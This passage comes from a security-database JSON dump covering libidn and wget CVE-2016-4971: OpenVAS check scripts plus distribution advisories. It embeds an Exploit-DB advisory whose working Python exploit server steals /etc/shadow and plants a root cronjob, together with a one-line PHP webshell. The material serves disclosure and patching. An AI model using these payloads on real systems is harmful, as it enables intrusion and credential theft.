res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11-dev\", ver:\"1.31-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11-java\", ver:\"1.31-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:45", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120709", "title": "Amazon Linux Local Check: alas-2016-720", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2016-720.nasl 11703 2018-10-01 08:05:31Z cfischer $\n#\n# Amazon Linux security check\n#\n# Authors:\n# Autogenerated by alas-generator developed by Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120709\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:15 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2016-720\");\n script_tag(name:\"insight\", value:\"GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. (CVE-2016-4971 )\");\n script_tag(name:\"solution\", value:\"Run yum update wget to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-720.html\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.18~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "unix", "description": "\nSimon Josefsson reports:\n\nstringprep_utf8_to_ucs4 now rejects invalid UTF-8. This function\n\t has always been documented to not validate that the input UTF-8\n\t string is actually valid UTF-8...\n\t \n\n", "modified": "2015-08-03T00:00:00", "published": "2015-02-09T00:00:00", "id": "4CAF01E2-30E6-11E5-A4A5-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/4caf01e2-30e6-11e5-a4a5-002590263bf5.html", "title": "libidn -- out-of-bounds read issue with invalid UTF-8 input", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:40", "bulletinFamily": "unix", "description": "\nGiuseppe Scrivano reports:\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the\n\t HTTP server and uses the name in the redirected URL as the destination\n\t filename.\n\n", "modified": "2016-06-09T00:00:00", "published": "2016-06-09T00:00:00", "id": "6DF56C60-3738-11E6-A671-60A44CE6887B", "href": "https://vuxml.freebsd.org/freebsd/6df56c60-3738-11e6-a671-60a44ce6887b.html", "title": "wget -- HTTP to FTP redirection file name confusion vulnerability", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "amazon": [{"lastseen": "2019-05-29T19:20:35", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nGNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. ([CVE-2016-4971 __](<https://access.redhat.com/security/cve/CVE-2016-4971>))\n\n \n**Affected Packages:** \n\n\nwget\n\n \n**Issue Correction:** \nRun _yum update wget_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n wget-debuginfo-1.18-1.18.amzn1.i686 \n wget-1.18-1.18.amzn1.i686 \n \n src: \n wget-1.18-1.18.amzn1.src \n \n x86_64: \n wget-1.18-1.18.amzn1.x86_64 \n wget-debuginfo-1.18-1.18.amzn1.x86_64 \n \n \n", "modified": "2016-07-14T16:30:00", "published": "2016-07-14T16:30:00", "id": "ALAS-2016-720", "href": "https://alas.aws.amazon.com/ALAS-2016-720.html", "title": "Medium: wget", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:40", "bulletinFamily": "unix", "description": "Dawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.", "modified": "2016-06-20T00:00:00", "published": "2016-06-20T00:00:00", "id": "USN-3012-1", "href": "https://usn.ubuntu.com/3012-1/", "title": "Wget vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T19:20:57", "bulletinFamily": "unix", "description": "Thijs Alkemade, Gustavo Grieco, Daniel Stenberg, and Nikos Mavrogiannopoulos discovered that Libidn incorrectly handled invalid UTF-8 characters. A remote attacker could use this issue to cause Libidn to crash, resulting in a denial of service, or possibly disclose sensitive memory. This issue only applied to Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-2059)\n\nHanno B\u00c3\u00b6ck discovered that Libidn incorrectly handled certain input. A remote attacker could possibly use this issue to cause Libidn to crash, resulting in a denial of service. (CVE-2015-8948, CVE-2016-6262, CVE-2016-6261, CVE-2016-6263)", "modified": "2016-08-24T00:00:00", "published": "2016-08-24T00:00:00", "id": "USN-3068-1", "href": "https://usn.ubuntu.com/3068-1/", "title": "Libidn vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-07-08T18:47:09", "bulletinFamily": "exploit", "description": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution. CVE-2016-4971. Remote exploit for linux platform", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "EDB-ID:40064", "href": "https://www.exploit-db.com/exploits/40064/", "type": "exploitdb", "title": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n\r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n\r\nhttps://www.gnu.org/software/wget/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n\r\nwget http://attackers-server/safe_file.txt\r\n\r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n\r\nFor example, if the attacker's server replies with the following response:\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n\r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n\r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n\r\nExecution flow:\r\n\r\nvictim@trusty:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n\r\nvictim@trusty:~$ pwd\r\n/home/victim\r\n\r\nvictim@trusty:~$ ls\r\nvictim@trusty:~$ \r\n\r\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n\r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n\r\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\r\n\r\n\r\nvictim@trusty:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\nvictim@trusty:~$ \r\n\r\n\r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a paramter. Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n\r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n\r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n\r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n\r\n\r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n\r\ndir_prefix = string\r\n\tTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\r\n\r\npost_file = file\r\n\tUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\r\n\r\nrecursive = on/off\r\n\tRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\r\n\r\ntimestamping = on/off\r\n\tAllows to overwrite existing files.\r\n\r\ncut_dirs = n\r\n\tIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\r\n\r\nhttp_proxy \r\n\tHTTP Proxy server\r\n\r\nhttps_proxy \r\n\tHTTPS Proxy server\r\n\r\noutput_document = file\r\n\tSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\r\n\r\ninput = file\r\n\tRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\r\n\r\nmetalink-over-http\r\n\tIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n\r\n\r\n\r\nFull list of .wgetrc options can be found in:\r\n\r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n\r\n1) Cronjob with wget scenario\r\n\r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n\r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n\r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n\r\nAs cron runs priodically attackers, could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n\r\n\r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n\r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n\r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n\r\n\r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n\r\nThe root cronjob on the victim server may look as follows:\r\n\r\nroot@victim:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n\r\n\r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n\r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n\r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n\r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n\r\n\r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n\r\n#!/usr/bin/env python\r\n\r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n\r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n\r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n\r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n\r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n\r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n\r\n return\r\n\r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n\r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n\r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint \"Ready? Is your FTP server running?\"\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n\r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n\r\nhandler.serve_forever()\r\n\r\n\r\n---[ eof ]---\r\n\r\n\r\n\r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n\r\nThe output should look similar to:\r\n\r\n\r\n---[ wget-exploit.py output ]---\r\n\r\nattackers-server# python ./wget-exploit.py \r\n\r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n\r\nServing wget exploit on port 80...\r\n\r\n\r\nWe have a volunteer requesting /database.db by GET :)\r\n\r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n\r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \r\n\r\nWe have a volunteer requesting /database.db by POST :)\r\n\r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n\r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n\r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n\r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n\r\n---[ output eof ]---\r\n\r\n\r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n\r\n\r\nroot@victim:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n\r\nroot@victim:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n\r\n2) PHP web application scenario\r\n\r\nIf wget is used within a PHP script e.g.:\r\n\r\n<?php\r\n\r\n// Update geoip data\r\n\r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\");\t\r\n\r\n?>\r\n\r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n\r\n<?php\r\n\t//webshell.php\r\n\r\n\tsystem($_GET['cmd']);\r\n?>\r\n\r\nby using the wget-exploit script described in example 1.\r\n\r\nAfter the upload he could simply execute the script and their shell\r\ncommand by a GET request to:\r\n\r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker access remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n\r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe networ who are able to intercept/modify the network traffic.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40064/"}], "debian": [{"lastseen": "2019-05-30T02:21:24", "bulletinFamily": "unix", "description": "Package : libidn\nVersion : 1.15-2+deb6u1\nCVE ID : CVE-2015-2059\n\nThijs Alkemade discovered that the Jabber server may pass an invalid\nUTF-8 string to libidn, the GNU library for Internationalized Domain\nNames (IDNs). In the case of the Jabber server, this results in\ninformation disclosure, and it is likely that some other applications\nusing libidn have similar vulnerabilities. This update changes libidn\nto check for invalid strings rather than assuming that the application\nhas done so.\n\nFor the oldoldstable distribution (squeeze), this problem has been\nfixed in version 1.15-2+deb6u1.\n\nFor the oldstable distribution (wheezy) and stable distribution\n(jessie), this problem will be fixed soon.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n", "modified": "2015-07-20T01:09:55", "published": "2015-07-20T01:09:55", "id": "DEBIAN:DLA-277-1:149FA", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201507/msg00015.html", "title": "[SECURITY] [DLA 277-1] libidn security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-22T14:30:24", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3578-1 security@debian.org\nhttps://www.debian.org/security/ Alessandro Ghedini\nMay 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libidn\nCVE ID : CVE-2015-2059\n\nIt was discovered that libidn, the GNU library for Internationalized\nDomain Names (IDNs), did not correctly handle invalid UTF-8 input,\ncausing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.29-1+deb8u1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 1.31-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.31-1.\n\nWe recommend that you upgrade your libidn packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-05-14T17:54:52", "published": "2016-05-14T17:54:52", "id": "DEBIAN:DSA-3578-1:1FEE8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00155.html", "title": "[SECURITY] [DSA 3578-1] libidn security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:45", "bulletinFamily": "unix", "description": "Package : wget\nVersion : 1.13.4-3+deb7u3\nCVE ID : CVE-2016-4971\nDebian Bug : 827003\n\nOn a server redirect from HTTP to a FTP resource, wget would trust\nthe HTTP server and uses the name in the redirected URL as the\ndestination filename.\nThis behaviour was changed and now it works similarly as a redirect\nfrom HTTP to another HTTP resource so the original name is used as\nthe destination file. To keep the previous behaviour the user must\nprovide --trust-server-names.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2016-06-30T20:15:25", "published": "2016-06-30T20:15:25", "id": "DEBIAN:DLA-536-1:51225", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201606/msg00037.html", "title": "[SECURITY] [DLA 536-1] wget security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:46", "bulletinFamily": "unix", "description": "Package : libidn\nVersion : 1.15-2+deb6u2\n\nAdam Sampson found a vulnerability in GNU Libidn, library that\nimplements the IETF IDN specifications. Libdin incorrectly handled\ninvalid UTF-8 input, causing it to bad free(). This issue was introduced\nby the fix for CVE-2015-2059.\n\nFor Debian 6 \u201cSqueeze\u201d, this issue has been fixed in the 1.15-2+deb6u2\nversion of libidn.\n", "modified": "2015-08-16T10:08:21", "published": "2015-08-16T10:08:21", "id": "DEBIAN:DLA-291-1:F7790", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201508/msg00005.html", "title": "[SECURITY] [DLA 291-1] libidn security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:04", "bulletinFamily": "unix", "description": "Package : libidn\nVersion : 1.25-2+deb7u1\nCVE ID : CVE-2015-2059\n\nIt was discovered that libidn, the GNU library for Internationalized\nDomain Names (IDNs), did not correctly handle invalid UTF-8 input,\ncausing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\n\nFor 